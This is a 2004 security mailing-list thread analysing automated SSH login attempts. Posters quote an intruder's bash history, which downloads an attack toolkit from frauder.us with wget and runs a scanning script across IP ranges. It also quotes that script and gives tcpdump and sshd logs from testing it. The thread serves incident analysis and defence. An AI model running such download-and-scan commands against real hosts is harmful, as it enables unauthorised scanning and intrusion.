Re: Re: Automated SSH login attempts?

[Andrei Galca-Vasiliu <andrei () fq ro>]

I've tested the exploit on my Slack 10 box, OpenSSH_3.8.1p1, from my machine.
The tcpdump output follows:

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
22:38:56.177625 IP (tos 0x0, ttl  61, id 64319, offset 0, flags [DF], length: 
60) 82.77.45.170.35528 > 213.157.171.49.22: S [tcp sum ok] 49755694:49755694
(0) win 5728 <mss 1432,sackOK,timestamp 272157969 0,nop,wscale 0>
22:38:56.190058 IP (tos 0x0, ttl  61, id 64320, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 
5728 <nop,nop,timestamp 272157985 647644964>
22:38:56.239677 IP (tos 0x0, ttl  61, id 64321, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 
5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.239897 IP (tos 0x0, ttl  61, id 64322, offset 0, flags [DF], length: 
72) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 
win 5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.295474 IP (tos 0x0, ttl  61, id 64323, offset 0, flags [DF], length: 
204) 82.77.45.170.35528 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 
<nop,nop,timestamp 272158084 647645031>
22:38:56.347138 IP (tos 0x0, ttl  61, id 64324, offset 0, flags [DF], length: 
196) 82.77.45.170.35528 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 
<nop,nop,timestamp 272158136 647645122>
22:38:56.419528 IP (tos 0x0, ttl  61, id 64325, offset 0, flags [DF], length: 
68) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 
1098 win 7904 <nop,nop,timestamp 272158209 647645166>
22:38:56.476041 IP (tos 0x0, ttl  61, id 64326, offset 0, flags [DF], length: 
104) 82.77.45.170.35528 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 
<nop,nop,timestamp 272158264 647645246>
22:38:56.490631 IP (tos 0x0, ttl  61, id 64327, offset 0, flags [DF], length: 
136) 82.77.45.170.35528 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 
<nop,nop,timestamp 272158278 647645263>
22:38:56.506077 IP (tos 0x0, ttl  61, id 64328, offset 0, flags [DF], length: 
104) 82.77.45.170.35528 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 
<nop,nop,timestamp 272158302 647645285>
22:38:56.506232 IP (tos 0x0, ttl  61, id 64329, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 
1234 win 7904 <nop,nop,timestamp 272158302 647645285>
22:38:56.511642 IP (tos 0x0, ttl  61, id 62364, offset 0, flags [DF], length: 
60) 82.77.45.170.35529 > 213.157.171.49.22: S [tcp sum ok] 53755391:53755391
(0) win 5728 <mss 1432,sackOK,timestamp 272158307 0,nop,wscale 0>
22:38:56.525150 IP (tos 0x0, ttl  61, id 64330, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 
1235 win 7904 <nop,nop,timestamp 272158310 647645295>
22:38:56.528352 IP (tos 0x0, ttl  61, id 62365, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 
5728 <nop,nop,timestamp 272158324 647645298>
22:38:56.538958 IP (tos 0x0, ttl  61, id 62366, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 
5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.539178 IP (tos 0x0, ttl  61, id 62367, offset 0, flags [DF], length: 
72) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 
win 5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.584001 IP (tos 0x0, ttl  61, id 62368, offset 0, flags [DF], length: 
204) 82.77.45.170.35529 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 
<nop,nop,timestamp 272158363 647645329>
22:38:56.661544 IP (tos 0x0, ttl  61, id 62369, offset 0, flags [DF], length: 
196) 82.77.45.170.35529 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 
<nop,nop,timestamp 272158452 647645411>
22:38:56.744357 IP (tos 0x0, ttl  61, id 62370, offset 0, flags [DF], length: 
68) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 
1098 win 7904 <nop,nop,timestamp 272158504 647645479>
22:38:56.799022 IP (tos 0x0, ttl  61, id 62371, offset 0, flags [DF], length: 
104) 82.77.45.170.35529 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 
<nop,nop,timestamp 272158592 647645571>
22:38:56.811454 IP (tos 0x0, ttl  61, id 62372, offset 0, flags [DF], length: 
136) 82.77.45.170.35529 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 
<nop,nop,timestamp 272158601 647645586>
22:38:56.832211 IP (tos 0x0, ttl  61, id 62373, offset 0, flags [DF], length: 
104) 82.77.45.170.35529 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 
<nop,nop,timestamp 272158623 647645606>
22:38:56.832365 IP (tos 0x0, ttl  61, id 62374, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 
1234 win 7904 <nop,nop,timestamp 272158623 647645606>
22:38:56.850483 IP (tos 0x0, ttl  61, id 62375, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 
1235 win 7904 <nop,nop,timestamp 272158638 647645621>

And this is the syslog entry:

Jul 29 22:38:56 master sshd[29520]: Illegal user test from 82.77.45.170
Jul 29 22:38:56 master sshd[29520]: Failed password for illegal user test from 
82.77.45.170 port 35528 ssh2
Jul 29 22:38:56 master sshd[29522]: Illegal user guest from 82.77.45.170
Jul 29 22:38:56 master sshd[29522]: Failed password for illegal user guest 
from 82.77.45.170 port 35529 ssh2

Can anyone figure it out?

Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek 
povestea:
> Hmmm - I have also been getting those login attemps, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>
> Whoever broke into the machine did not take any attempts to cover up his
> tracks - this is what I found in /root/.bash_history:
>
> ------
> id
> uname -a
> w
> id
> ls
> wgte frauder.us/linux/ssh.tgz
> wget frauder.us/linux/ssh.tgz
> tar xzvf ssh.tgz
> tar xvf ssh.tgz
> ls
> cd ssh
> ls
> ./go.sh 195.178
> ls
> pico uniq.txt
> vi uniq.txt
> ls
> rm -rf uniq.txt
> ./go.sh 167.205
> ls
> rm -rf uniq.txt  vuln.txt
> ./go.sh 202.148.20
> ./go.sh 212.92
> ./go.sh 195.197
> ./go.sh 147.32
> ./go.sh 213.168
> ./go.sh 134.176
> ./go.sh 195.83
> ------
>
> um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
> binaries:
>
> go.sh:
> -------
> ./ss 22 -b $1 -i eth0 -s 6
> cat bios.txt |sort | uniq > uniq.txt
> ./sshf
> -------
>
> * 'ss' apparently is some sort of portscanner
> * 'sshf' connects to every IP in uniq.txt and tries to log in as user
> 'test' first, then as user 'guest' (according to tcpdump).
>
> This does not seem to be a stupid brute force attack, as there is only
> one login attempt per user. Could it be that the tool tries to exploit
> some vulnerability in the sshd, and just tries to look harmless by using
> 'test' and 'guest' as usernames?
>
> The compromised machine was running an old debian woody installation
> which had not been upgraded for at least one year, the sshd version
> string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
>
> As already mentioned, I am far from being an expert, but if I can assist
> in further testing, then let me know. Please CC me, I am not subscribed
> to the list.
>
> cheers,
> Stefan
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

Andrei Galca-Vasiliu
Folio Q Advertising
www.fq.ro

Security is an illusion...

*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html